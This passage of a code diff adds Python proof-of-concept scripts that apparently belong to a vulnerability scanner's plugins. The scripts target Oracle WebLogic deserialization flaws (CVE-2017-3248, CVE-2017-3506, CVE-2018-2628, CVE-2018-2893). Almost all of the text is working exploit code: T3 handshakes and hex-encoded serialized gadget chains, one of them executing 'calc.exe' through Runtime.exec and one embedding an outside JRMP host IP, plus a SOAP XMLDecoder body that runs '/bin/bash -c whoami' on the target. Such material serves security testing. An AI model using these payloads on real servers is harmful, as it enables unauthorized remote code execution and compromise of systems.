    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
 def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
 def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        print(('[+]目标weblogic存在JAVA反序列化漏洞：{}'.format(VUL[index])))
    else:
        # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
        print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 def run(rip,rport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(10)
    server_addr = (rip, rport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,rport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    checkVul(rs,server_addr,index)
 if __name__=="__main__":
    rip = '127.0.0.1'
    rport = 7001
    run(rip,rport,0)
--- a/plugins/weblogic_poc/CVE_2017_3248.py
+++ b/plugins/weblogic_poc/CVE_2017_3248.py
@@ -0,0 +1,68 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import socket
 import time
 import re
 VUL=['CVE-2017-3248']
 PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078']
 VER_SIG=['\\$Proxy[0-9]+']
 def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
 def buildT3RequestObject(sock,rport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
 def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
 def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        print(('[+]目标weblogic存在JAVA反序列化漏洞：{}'.format(VUL[index])))
    else:
        # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
        print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 def run(rip,rport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(10)
    server_addr = (rip, rport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,rport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    checkVul(rs,server_addr,index)
 if __name__=="__main__":
    rip = '127.0.0.1'
    rport = 7001
    run(rip,rport,0)
--- a/plugins/weblogic_poc/CVE_2017_3506.py
+++ b/plugins/weblogic_poc/CVE_2017_3506.py
@@ -0,0 +1,72 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import requests
 import re
 from sys import argv
 heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
    }
 def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
 				<void index="2">
                  <string>whoami</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''
    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception as e:
        response = ""
    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        result = '[+]目标weblogic存在JAVA反序列化漏洞：CVE-2017-3506'
        return result
    else:
        result = '[-]目标weblogic未检测到CVE-2017-3506'
        return result
 def run(rip,rport):
    url=rip+':'+str(rport)
    result = poc(url=url)
    print(result)
 if __name__ == '__main__':
    run('127.0.0.1',7001)
--- a/plugins/weblogic_poc/CVE_2018_2628.py
+++ b/plugins/weblogic_poc/CVE_2018_2628.py
@@ -0,0 +1,80 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import socket
 import sys
 import time
 import re
 VUL=['CVE-2018-2628']
 PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
 VER_SIG=['\\$Proxy[0-9]+']
 def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
 def buildT3RequestObject(sock,dport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
 def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
 def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        print(('[+]目标weblogic存在JAVA反序列化漏洞：{}'.format(VUL[index])))
    else:
        # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
        print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(10)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    # print 'rs',rs
    checkVul(rs,server_addr,index)
 if __name__=="__main__":
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    run(dip,dport,0)
--- a/plugins/weblogic_poc/CVE_2018_2893.py
+++ b/plugins/weblogic_poc/CVE_2018_2893.py
@@ -0,0 +1,85 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import socket
 import time
 import re
 import sys
 VUL=['CVE-2018-2893']
 PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878']
 VER_SIG=['StreamMessageImpl']
 def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    data = sock.recv(1024)
 def buildT3RequestObject(sock,port):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
 def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
